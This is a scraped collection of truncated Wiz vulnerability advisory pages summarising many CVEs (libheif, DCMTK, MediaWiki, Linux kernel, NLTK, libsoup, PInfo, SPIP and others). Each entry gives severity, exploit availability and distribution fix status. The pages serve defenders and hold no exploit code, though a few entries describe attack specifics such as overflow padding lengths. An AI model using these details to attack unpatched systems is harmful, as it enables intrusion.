Linux Fedora
Has Public Exploit No
Wiz
CVE-2026-3950 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-3950 [MEDIUM] CVE-2026-3950 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-3950 :
Linux Debian vulnerability analysis and mitigation
A vulnerability was identified in strukturag libheif up to 1.21.2. This impacts the function Track::load of the file libheif/sequences/track.cc of the component stsz/stts. The manipulation leads to out-of-bounds read. The attack needs to be performed locally. The exploit is publicly available and might be used. Applying a patch is the recommended action to fix this issue. The patch available is inofficial and not approved yet.
Source : NVD
## 4.8
Score
Published March 11, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.8
Exploitat
Wiz
CVE-2025-14841 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
CVE-2025-14841 [MEDIUM] CVE-2025-14841 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-14841 :
Linux Debian vulnerability analysis and mitigation
A flaw has been found in OFFIS DCMTK up to 3.6.9. The impacted element is the function DcmQueryRetrieveIndexDatabaseHandle::startFindRequest/DcmQueryRetrieveIndexDatabaseHandle::startMoveRequest in the library dcmqrdb/libsrc/dcmqrdbi.cc of the component dcmqrscp. This manipulation causes null pointer dereference. The attack requires local access. Upgrading to version 3.7.0 is sufficient to resolve this issue. Patch name: ffb1a4a37d2c876e3feeb31df4930f2aed7fa030. You should upgrade the affected component.
Source : NVD
## 4.8
Score
Published December 18, 2025
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA K
Wiz
CVE-2025-6594 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-6594 [MEDIUM] CVE-2025-6594 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-6594 :
Linux Debian vulnerability analysis and mitigation
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Wikimedia Foundation MediaWiki. This vulnerability is associated with program files resources/src/mediawiki.Special.Apisandbox/ApiSandbox.Js.
This issue affects MediaWiki: from 1.27.0 before 1.39.13, 1.42.7 1.43.2, 1.44.0.
Source : NVD
Published February 2, 2026
Severity NONE
CNA Score N/A
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mediawiki
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM Has
Wiz
CVE-2025-68805 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-68805 [MEDIUM] CVE-2025-68805 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68805 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
fuse: fix io-uring list corruption for terminated non-committed requests
When a request is terminated before it has been committed, the request
is not removed from the queue's list. This leaves a dangling list entry
that leads to list corruption and use-after-free issues.
Remove the request from the queue's list for terminated non-committed
requests.
Source : NVD
Published January 13, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.7
Exploitation Probability (EPSS) N/A
Affected pa
Wiz
CVE-2026-0847 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2026-0847 [HIGH] CVE-2026-0847 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-0847 :
Linux Debian vulnerability analysis and mitigation
A vulnerability in NLTK versions up to and including 3.9.2 allows arbitrary file read via path traversal in multiple CorpusReader classes, including WordListCorpusReader, TaggedCorpusReader, and BracketParseCorpusReader. These classes fail to properly sanitize or validate file paths, enabling attackers to traverse directories and access sensitive files on the server. This issue is particularly critical in scenarios where user-controlled file inputs are processed, such as in machine learning APIs, chatbots, or NLP pipelines. Exploitation of this vulnerability can lead to unauthorized access to sensitive files, including system files, SSH private keys, and API tokens, and may potentially escalate to remote code execution
Wiz
CVE-2025-68726 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2025-68726 [MEDIUM] CVE-2025-68726 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68726 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
crypto: aead - Fix reqsize handling
Commit afddce13ce81d ("crypto: api - Add reqsize to crypto_alg")
introduced cra_reqsize field in crypto_alg struct to replace type
specific reqsize fields. It looks like this was introduced specifically
for ahash and acomp from the commit description as subsequent commits
add necessary changes in these alg frameworks.
However, this is being recommended for use in all crypto algs
instead of setting reqsize using crypto_*_set_reqsize(). Using
cra_reqsize in aead algorithms, hence, causes memory corruptions and
crashes as the underlying functions in the algorithm framework have not
been updated to set the reqsize pr
Wiz
CVE-2026-5119 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-5119 [MEDIUM] CVE-2026-5119 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-5119 :
Linux Debian vulnerability analysis and mitigation
A flaw was found in libsoup. When establishing HTTPS tunnels through a configured HTTP proxy, sensitive session cookies are transmitted in cleartext within the initial HTTP CONNECT request. A network-positioned attacker or a malicious HTTP proxy can intercept these cookies, leading to potential session hijacking or user impersonation.
Source : NVD
## 8.2
Score
Published March 30, 2026
Severity HIGH
CNA Score 5.9
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
libsoup-devel
libsoup2.4
Sources
Wiz
CVE-2025-71092 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2025-71092 [HIGH] CVE-2025-71092 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-71092 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
RDMA/bnxt_re: Fix OOB write in bnxt_re_copy_err_stats()
Commit ef56081d1864 ("RDMA/bnxt_re: RoCE related hardware counters
update") added three new counters and placed them after
BNXT_RE_OUT_OF_SEQ_ERR.
BNXT_RE_OUT_OF_SEQ_ERR acts as a boundary marker for allocating hardware
statistics with different num_counters values on chip_gen_p5_p7 devices.
As a result, BNXT_RE_NUM_STD_COUNTERS are used when allocating
hw_stats, which leads to an out-of-bounds write in
bnxt_re_copy_err_stats().
The counters BNXT_RE_REQ_CQE_ERROR, BNXT_RE_RESP_CQE_ERROR, and
BNXT_RE_RESP_REMOTE_ACCESS_ERRS are applicable to generic hardware, not
only p5/p7 devices.
Fix this
Wiz
CVE-2026-34956 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-34956 [MEDIUM] CVE-2026-34956 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34956 :
Linux Debian vulnerability analysis and mitigation
heap overflow with a specially crafted FTP packet
Source : NVD
Published April 2, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
openvswitch
Sources
NVD
Debian 11, 12, 13 No Fix Added at: Apr 02, 2026
Debian 14 Has Fix Added at: Apr 02, 2026
Echo No Fix Added at: Apr 02, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Linux Debian vulnerabilities:
CVE ID
Severity
Score
Wiz
CVE-2026-23203 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
CVE-2026-23203 [MEDIUM] CVE-2026-23203 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23203 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
net: cpsw_new: Execute ndo_set_rx_mode callback in a work queue
Commit 1767bb2d47b7 ("ipv6: mcast: Don't hold RTNL for
IPV6_ADD_MEMBERSHIP and MCAST_JOIN_GROUP.") removed the RTNL lock for
IPV6_ADD_MEMBERSHIP and MCAST_JOIN_GROUP operations. However, this
change triggered the following call trace on my BeagleBone Black board:
WARNING: net/8021q/vlan_core.c:236 at vlan_for_each+0x120/0x124, CPU#0: rpcbind/496
RTNL: assertion failed at net/8021q/vlan_core.c (236)
Modules linked in:
CPU: 0 UID: 997 PID: 496 Comm: rpcbind Not tainted 6.19.0-rc6-next-20260122-yocto-standard+ #8 PREEMPT
Hardware name: Generic AM33XX (Flattened Device Tree)
Call trace:
unw
Wiz
CVE-2026-3633 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-3633 [MEDIUM] CVE-2026-3633 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-3633 :
Linux Debian vulnerability analysis and mitigation
soup_message_new()
Source : NVD
## 6.5
Score
Published March 17, 2026
Severity MEDIUM
CNA Score 3.9
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
libsoup
libsoup3-devel
Sources
NVD
Debian 11, 12, 13, 14 Severity MEDIUM No Fix Added at: Mar 09, 2026
Echo Severity MEDIUM No Fix Added at: Mar 09, 2026
Red Hat 6, 7, 8, 9, 10 Severity LOW No Fix Added at: Mar 08, 2026
Red Hat 7 Severity MEDIUM Has Fix Added at: Mar 08, 2026
Ubuntu 16.04, 18.04, 20.04, 22.04, 24.04, 25.10 Severity MEDIUM No
Wiz
CVE-2025-14607 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-14607 [MEDIUM] CVE-2025-14607 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-14607 :
Linux Debian vulnerability analysis and mitigation
A vulnerability was detected in OFFIS DCMTK up to 3.6.9. Affected by this issue is the function DcmByteString::makeDicomByteString of the file dcmdata/libsrc/dcbytstr.cc of the component dcmdata. The manipulation results in memory corruption. The attack can be launched remotely. Upgrading to version 3.7.0 can resolve this issue. The patch is identified as 4c0e5c10079392c594d6a7abd95dd78ac0aa556a. You should upgrade the affected component.
Source : NVD
## 5.3
Score
Published December 13, 2025
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 27.8
E
Wiz
CVE-2026-5318 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-5318 [MEDIUM] CVE-2026-5318 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-5318 :
Linux Debian vulnerability analysis and mitigation
A weakness has been identified in LibRaw up to 0.22.0. This impacts the function HuffTable::initval of the file src/decompressors/losslessjpeg.cpp of the component JPEG DHT Parser. This manipulation of the argument bits[] causes out-of-bounds write. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks. Upgrading to version 0.22.1 will fix this issue. Patch name: a6734e867b19d75367c05f872ac26322464e3995. It is advisable to upgrade the affected component.
Source : NVD
## 5.3
Score
Published April 2, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA
Wiz
CVE-2017-20225 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.3
CVE-2017-20225 [CRITICAL] CVE-2017-20225 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2017-20225 :
Linux Debian vulnerability analysis and mitigation
TiEmu 2.08 and prior contains a stack-based buffer overflow vulnerability that allows attackers to execute arbitrary code by exploiting inadequate boundary checks on user-supplied input. Attackers can trigger the overflow through command-line arguments passed to the application, leveraging ROP gadgets to bypass protections and execute shellcode in the application context.
Source : NVD
## 9.3
Score
Published March 28, 2026
Severity CRITICAL
CNA Score 9.3
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 25.2
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
Wiz
CVE-2026-5121 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-5121 [MEDIUM] CVE-2026-5121 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-5121 :
Linux Debian vulnerability analysis and mitigation
A flaw was found in libarchive. On 32-bit systems, an integer overflow vulnerability exists in the zisofs block pointer allocation logic. A remote attacker can exploit this by providing a specially crafted ISO9660 image, which can lead to a heap buffer overflow. This could potentially allow for arbitrary code execution on the affected system.
Source : NVD
## 9.8
Score
Published March 30, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 47.5
Exploitation Probability (EPSS) 0.2
Affected packages and libraries
bsdtar
libarchive
So
Wiz
CVE-2023-54249 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2023-54249 [MEDIUM] CVE-2023-54249 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2023-54249 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
bus: mhi: ep: Only send -ENOTCONN status if client driver is available
For the STOP and RESET commands, only send the channel disconnect status
-ENOTCONN if client driver is available. Otherwise, it will result in
null pointer dereference.
Source : NVD
Published December 30, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux
linux-aws-fips
Sources
NVD
Debian 12, 13, 14 Has Fix Added at: Dec 31, 2025
Echo
Wiz
CVE-2025-14936 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2025-14936 [HIGH] CVE-2025-14936 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-14936 :
Linux Debian vulnerability analysis and mitigation
NSF Unidata NetCDF-C Attribute Name Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of NSF Unidata NetCDF-C. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
The specific flaw exists within the parsing of attribute names. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27269.
Source : NVD
## 7.8
Score
Published Decem
Wiz
CVE-2016-20044 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2016-20044 [HIGH] CVE-2016-20044 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2016-20044 :
Echo vulnerability analysis and mitigation
PInfo 0.6.9-5.1 contains a local buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying an oversized argument to the -m parameter. Attackers can craft a malicious input string with 564 bytes of padding followed by a return address to overwrite the instruction pointer and execute shellcode with user privileges.
Source : NVD
## 8.6
Score
Published March 28, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
pinfo
Sources
NVD
Echo Severity HIGH No Fix
Wiz
CVE-2020-37182 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2020-37182 [HIGH] CVE-2020-37182 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2020-37182 :
Echo vulnerability analysis and mitigation
Redir 3.3 contains a stack overflow vulnerability in the doproxyconnect() function that allows attackers to crash the application by sending oversized input. Attackers can exploit the sprintf() buffer without proper length checking to overwrite memory and cause a segmentation fault, resulting in program termination.
Source : NVD
## 8.7
Score
Published February 11, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 16.9
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
redir
Sources
NVD
Echo Severity HIGH No Fix Added at: Feb 15, 2026
## Get
Wiz
CVE-2025-31510 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.2
CVE-2025-31510 [HIGH] CVE-2025-31510 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-31510 :
Linux Debian vulnerability analysis and mitigation
In the portal in LemonLDAP::NG before 2.21.0, cross-site scripting (XSS) allows remote attackers to inject arbitrary web script or HTML (into the login page) via the tab parameter, for Choice authentication.
Source : NVD
## 7.2
Score
Published January 16, 2026
Severity HIGH
CNA Score 7.2
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
lemonldap-ng
Sources
NVD
Debian 11, 12, 13 Severity HIGH Has Fix Added at: Apr 08, 2025
Debian 14 Severity HIGH Has Fix Added at: Aug 10, 2025
Echo Severity HIGH Has
Wiz
CVE-2026-23305 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-23305 [MEDIUM] CVE-2026-23305 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23305 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
accel/rocket: fix unwinding in error path in rocket_probe
When rocket_core_init() fails (as could be the case with EPROBE_DEFER),
we need to properly unwind by decrementing the counter we just
incremented and if this is the first core we failed to probe, remove the
rocket DRM device with rocket_device_fini() as well. This matches the
logic in rocket_remove(). Failing to properly unwind results in
out-of-bounds accesses.
Source : NVD
Published March 25, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS)
Wiz
CVE-2026-1757 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.2
CVE-2026-1757 [MEDIUM] CVE-2026-1757 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-1757 :
Linux Debian vulnerability analysis and mitigation
A flaw was identified in the interactive shell of the xmllint utility, part of the libxml2 project, where memory allocated for user input is not properly released under certain conditions. When a user submits input consisting only of whitespace, the program skips command execution but fails to free the allocated buffer. Repeating this action causes memory to continuously accumulate. Over time, this can exhaust system memory and terminate the xmllint process, creating a denial-of-service condition on the local system.
Source : NVD
## 6.2
Score
Published February 2, 2026
Severity MEDIUM
CNA Score 6.2
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Relea
Wiz
CVE-2025-3839 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.0
CVE-2025-3839 [HIGH] CVE-2025-3839 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-3839 :
Linux Debian vulnerability analysis and mitigation
A flaw was found in Epiphany, a tool that allows websites to open external URL handler applications with minimal user interaction. This design can be misused to exploit vulnerabilities within those handlers, making them appear remotely exploitable. The browser fails to properly warn or gate this action, resulting in potential code execution on the client device via trusted UI behavior.
Source : NVD
## 8
Score
Published January 23, 2026
Severity HIGH
CNA Score 8.0
Affected Technologies
Linux Debian
Linux Fedora
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.4
Exploitation Probability (EPSS) N/A
Affected packages
Wiz
CVE-2026-4541 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-4541 [MEDIUM] CVE-2026-4541 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-4541 :
Linux Debian vulnerability analysis and mitigation
A flaw has been found in janmojzis tinyssh up to 20250501. Impacted is an unknown function of the file tinyssh/crypto_sign_ed25519_tinyssh.c of the component Ed25519 Signature Handler. This manipulation causes improper verification of cryptographic signature. The attack is restricted to local execution. The attack's complexity is rated as high. The exploitability is considered difficult. The exploit has been published and may be used. Upgrading to version 20260301 is recommended to address this issue. Patch name: 9c87269607e0d7d20174df742accc49c042cff17. Upgrading the affected component is recommended. If you want to get best quality of vulnerability data, you may have to visit VulDB.
Source : NVD
## 2
Score
Publ
Wiz
CVE-2026-22206 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-22206 [HIGH] CVE-2026-22206 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22206 :
Linux Debian vulnerability analysis and mitigation
SPIP versions prior to 4.4.10 contain a SQL injection vulnerability that allows authenticated low-privilege users to execute arbitrary SQL queries by manipulating union-based injection techniques. Attackers can exploit this SQL injection flaw combined with PHP tag processing to achieve remote code execution on the server.
Source : NVD
## 8.7
Score
Published February 26, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 44.4
Exploitation Probability (EPSS) 0.2
Affected packages and libraries
spip
Sources
NVD
Debian 11 Severity HIGH No Fix A
Wiz
CVE-2026-5663 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-5663 [MEDIUM] CVE-2026-5663 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-5663 :
Linux Debian vulnerability analysis and mitigation
A security flaw has been discovered in OFFIS DCMTK up to 3.7.0. This impacts the function executeOnReception/executeOnEndOfStudy of the file dcmnet/apps/storescp.cc of the component storescp. Performing a manipulation results in os command injection. Remote exploitation of the attack is possible. The patch is named edbb085e45788dccaf0e64d71534cfca925784b8. Applying a patch is the recommended action to fix this issue.
Source : NVD
## 6.9
Score
Published April 6, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 74.6
Exploitation Probability (EP
Wiz
CVE-2026-4739 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-4739 [MEDIUM] CVE-2026-4739 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-4739 :
Linux Debian vulnerability analysis and mitigation
Integer Overflow or Wraparound vulnerability in InsightSoftwareConsortium ITK (Modules/ThirdParty/Expat/src/expat modules).This issue affects ITK: before 2.7.1.
Source : NVD
## 9.4
Score
Published March 24, 2026
Severity CRITICAL
CNA Score 9.4
Affected Technologies
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 17.3
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
seal-expat
Sources
NVD
Debian Has Fix Added at: Mar 26, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related L
Wiz
CVE-2026-23265 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
CVE-2026-23265 CVE-2026-23265 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23265 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
f2fs: fix to do sanity check on node footer in {read,write}_end_io
-----------[ cut here ]------------
kernel BUG at fs/f2fs/data.c:358!
Call Trace: blk_update_request+0x5eb/0xe70 block/blk-mq.c:987
blk_mq_end_request+0x3e/0x70 block/blk-mq.c:1149
blk_complete_reqs block/blk-mq.c:1224 [inline]
blk_done_softirq+0x107/0x160 block/blk-mq.c:1229
handle_softirqs+0x283/0x870 kernel/softirq.c:579
__do_softirq kernel/softirq.c:613 [inline]
invoke_softirq kernel/softirq.c:453 [inline]
__irq_exit_rcu+0xca/0x1f0 kernel/softirq.c:680
irq_exit_rcu+0x9/0x30 kernel/softirq.c:696
instr_sysvec_apic_timer_interrupt arch/x86/kernel/apic/apic.c:1050 [inline]
sysvec_api
Wiz
CVE-2025-6589 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.1
CVE-2025-6589 [LOW] CVE-2025-6589 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-6589 :
Linux Debian vulnerability analysis and mitigation
Vulnerability in Wikimedia Foundation MediaWiki. This vulnerability is associated with program files includes/specials/pagers/BlockListPager.Php.
This issue affects MediaWiki: >= 1.42.0.
Source : NVD
## 2.1
Score
Published February 2, 2026
Severity LOW
CNA Score 2.1
Affected Technologies
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mediawiki
Sources
NVD
Debian 11, 12 No Fix Added at: Jul 03, 2025
Debian 13 Has Fix Added at: Jul 03, 2025
Debian 14 Has Fix Added at: Aug 10, 2025
## Get a CVE risk assessment
Get a priori
Wiz
CVE-2026-3836 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-3836 [MEDIUM] CVE-2026-3836 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-3836 :
Linux Debian vulnerability analysis and mitigation
A flaw was found in dnf5. A local, unprivileged attacker can exploit a path traversal vulnerability in the D-Bus locale configuration. By providing a specially crafted string to the locale key during session opening, the attacker can force the dnf5daemon-server to terminate, leading to an application-level Denial of Service (DoS) with a core dump.
Source : NVD
Published March 9, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Fedora
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
ruby-libdnf5-debuginfo
dnf5-debuginfo
Sources
NVD
De
Wiz
CVE-2025-48517 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.6
CVE-2025-48517 [MEDIUM] CVE-2025-48517 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-48517 :
Linux Debian vulnerability analysis and mitigation
Insufficient Granularity of Access Control in SEV firmware could allow a privileged user with a malicious hypervisor to create a SEV-ES guest with an ASID in the range meant for SEV-SNP guests potentially resulting in a partial loss of confidentiality.
Source : NVD
## 4.6
Score
Published February 10, 2026
Severity MEDIUM
CNA Score 4.6
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
amd64-microcode
Sources
NVD
Debian 11 No Fix Added at: Feb 11, 2026
Echo No Fix Added at: Feb 11, 2026
## Get a CVE
Wiz
CVE-2025-69653 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2025-69653 [MEDIUM] CVE-2025-69653 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-69653 :
Linux Debian vulnerability analysis and mitigation
A crafted JavaScript input can trigger an internal assertion failure in QuickJS release 2025-09-13, fixed in commit 1dbba8a88eaa40d15a8a9b70bb1a0b8fb5b552e6 (2025-12-11), in file gc_decref_child in quickjs.c, when executed with the qjs interpreter using the -m option. This leads to an abort (SIGABRT) during garbage collection and causes a denial-of-service.
Source : NVD
## 6.5
Score
Published March 6, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 12.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
quickjs
Sources
Wiz
CVE-2026-25916 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.3
CVE-2026-25916 [MEDIUM] CVE-2026-25916 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25916 :
Linux Debian vulnerability analysis and mitigation
Roundcube Webmail before 1.5.13 and 1.6 before 1.6.13, when "Block remote images" is used, does not block SVG feImage.
Source : NVD
## 4.3
Score
Published February 9, 2026
Severity MEDIUM
CNA Score 4.3
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
